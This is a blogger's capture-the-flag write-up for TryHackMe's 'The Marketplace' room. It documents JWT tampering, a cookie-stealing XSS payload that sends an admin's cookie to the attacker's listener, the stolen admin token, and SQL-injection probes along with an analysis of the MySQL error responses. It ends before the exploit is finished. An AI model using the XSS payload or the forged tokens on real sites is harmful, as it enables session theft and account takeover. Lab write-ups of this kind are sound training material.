The Marketplace – writeup tryhackme


JWT token found
Cookie: token=eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJ1c2VySWQiOjQsInVzZXJuYW1lIjoibW9hIiwiYWRtaW4iOmZhbHNlLCJpYXQiOjE2MDMxODQzNzB9.cHhTfERXZoGvHZu5wEFEqRN5paZc6FZIH8AUPVFcHsY

Decoded, its header and payload are:
{"alg":"HS256","typ":"JWT"}
{"userId":4,"username":"moa","admin":false,"iat":1603184370}

Hand-edited variants: the same payload with admin flipped to true (re-encoded below), and a cookie whose payload sets userId to 1, username to "michael' or 1=1" and admin to true. Both keep the original signature, so they are only accepted if the server never checks the HMAC. Note also that the "=" on the re-encoded payload and the trailing "K" on the cookie's payload (a base64-encoded newline from echo) are not valid in a JWT, whose segments are unpadded base64url.
{"userId":1,"username":"michael' or 1=1","admin":true,"iat":1603184370}
eyJ1c2VySWQiOjQsInVzZXJuYW1lIjoibW9hIiwiYWRtaW4iOnRydWUsImlhdCI6MTYwMzE4NDM3MH0=
Cookie: token=eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJ1c2VySWQiOjEsInVzZXJuYW1lIjoibWljaGFlbCcgb3IgMT0xIiwiYWRtaW4iOnRydWUsImlhdCI6MTYwMzE4NDM3MH0K.cHhTfERXZoGvHZu5wEFEqRN5paZc6FZIH8AUPVFcHsY

OK, since I found a reflected XSS, and there was an ability to report stuff to the admins, which is automatically responded to by an admin account, we can steal their cookies. I'm running a cookie stealer and injected

"><script>var i=new Image;i.src="http://ip:8888/?"+document.cookie;</script>

(shown decoded: as submitted the spaces were "+"-encoded, and the script tags, which the blog's renderer appears to have swallowed, are restored here) as a new item on the page, and my stealer got loot:

kali@kali:~/tools$ python cookiestealer.py
Started http server

2020-10-20 05:43 AM - 10.10.78.239 Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) HeadlessChrome/85.0.4182.0 Safari/537.36
token ['eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJ1c2VySWQiOjIsInVzZXJuYW1lIjoibWljaGFlbCIsImFkbWluIjp0cnVlLCJpYXQiOjE2MDMxODcwMDl9.V_7aVbdmO7438VdqJiIkczotl0TljZupDQvaQwhNy5o']

That got the first flag :) THM{xxx}

SQLi found in http://10.10.8.75/xxx

Probe (URL-encoded as sent; it decodes to ; execute immediate 'sel' || 'ect us' || 'er'):
%3b%20execute%20immediate%20'sel'%20%7c%7c%20'ect%20us'%20%7c%7c%20'er'

Response body:
<h2>Error: ER_PARSE_ERROR: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near &#39;; execute immediate &#39;sel&#39; || &#39;ect us&#39; || &#39;er&#39;&#39; at line 1</h2>

Full response to a second probe:
HTTP/1.1 500 Internal Server Error
Server: nginx/1.19.2
Date: Sat, 24 Oct 2020 18:18:12 GMT
Content-Type: text/html; charset=utf-8
Content-Length: 757
Connection: close
X-Powered-By: Express
ETag: W/"2f5-drQF/DLtuZWnrPXCr3lYSPJxZX0"
Error: ER_PARSE_ERROR: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''' at line 1

Two things fall out of these errors. First, the backend is Express (X-Powered-By) in front of MySQL, not Oracle: ER_PARSE_ERROR is the name the Node MySQL drivers give MySQL's syntax error 1064, and the message itself says "MySQL server version". The probe uses Oracle idioms (execute immediate, and || as string concatenation); in MySQL there is no EXECUTE IMMEDIATE, and || is logical OR unless sql_mode includes PIPES_AS_CONCAT, so it was never going to run there. Second, MySQL's "near '...'" quotes the rest of the statement from the token the parser gave up on. In the first response that remainder is the injected text itself, starting at the ";", and in the second it is a lone "'", so the input reaches the parser unescaped and apparently sits in an unquoted position: a ";" starts a second statement, which the drivers refuse by default (multipleStatements is off), and a bare "'" opens a string that never closes.

Gotta exploit it… TBC
